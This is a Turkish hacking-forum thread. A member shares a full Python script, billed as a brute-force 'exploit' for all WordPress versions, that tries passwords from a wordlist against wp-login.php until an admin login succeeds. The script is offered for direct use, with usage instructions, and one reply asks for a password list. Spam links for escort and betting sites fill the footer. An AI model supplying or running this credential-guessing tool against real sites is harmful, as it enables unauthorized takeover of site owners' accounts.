Wordpress All Version Brute Force Exploit (v1)

redkit

Prof Spys-z
Katılım
22 Nis 2013
Mesajlar
880
Tepkime puanı
2
Puanları
0
Wordpress All Version Brute Force Exploit (v1)


WP tüm versiyonlarında brute force saldırısı yapabilmenşze olanak saplar. perl scriptidir.

Konu yine gizli olmayacak. Deneme amaçlı konuları gizlemeyecem duruma göre tekrar ilerde gizleyebilirim veya vip bölümüne konuları açabilirim.

Kodları wpbrute.py şeklinde kaydedip kullanabilirsiniz.
Code:

Kod:
import os
import sys
import requests
import optparse
import time
import threading
import subprocess


#Coded by B3mB4m
#Concat : b3mb4m@mail.com
#Home : https://github.com/b3mb4m
#Youtube : http://www.youtube.com/watch?v=lZxzh-DgXW8
#Example : wpbrute.py --url http://127.0.0.1/wordpress/wp-login.php  --username b3mb4m --list test.txt
#I was did some mistakes will be release v2 soon !  



class B3mB4m(object):
	def __init__(self, victim, user, listt):
		if os.name == 'nt':
			self.systemname = "cls"
		elif os.name == 'posix':
			self.systemname = "posix" #Linux yey ! <3

		for self.last,line in enumerate(open(listt)):
			self.last = self.last + 1	
		with open(listt) as b:
		    self.satirlar = b.readlines() 
		#self.first = self.last / 2    
		self.url = victim
		self.admin = user
		self.text = listt
		threading.Thread(target=self.th).start()

	def th(self):
		for i in self.satirlar[0:self.last]:
			self.send( i.strip())
			time.sleep(0.01)

	def send(self, password):
		self.payload = {'log':self.admin, 'pwd':password, 'wp-submit':'Log+In'}
		self.go = requests.post(self.url, data=self.payload)
		if '<li id="wp-admin-bar-logout">' in self.go.text:
			subprocess.call([str(self.systemname)], shell=True)
			print "\t\nUsername -- > %s " % str(self.admin)
			print "\t\nPassword -- > %s " % str(password)
			sys.exit()
		else:
			print "Trying %s .. " % (str(password))	

if __name__ == '__main__':
	parser = optparse.OptionParser()
	parser.add_option('--url', action="store")
	parser.add_option('--username', action="store")
	parser.add_option('--list', action="store")
	options, args = parser.parse_args()
	if not options.url or not options.list or not options.username:
		print """
		Coded By B3mB4m <3 
		\nHow to use? !
		\n\twpbrute.py --url http://127.0.0.1/wordpress/wp-login.php  --username b3mb4m --list test.txt
		"""
		sys.exit() 
	else:
		B3mB4m(options.url,options.username,options.list)

# ajanlar.org [2014-11-23]
 

BL3W3

Yeni Üye
Katılım
4 Ara 2014
Mesajlar
2
Tepkime puanı
0
Puanları
0
Kardeşim Şifre list yok ... Bilgine Konuyu Düzenle bence ..
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012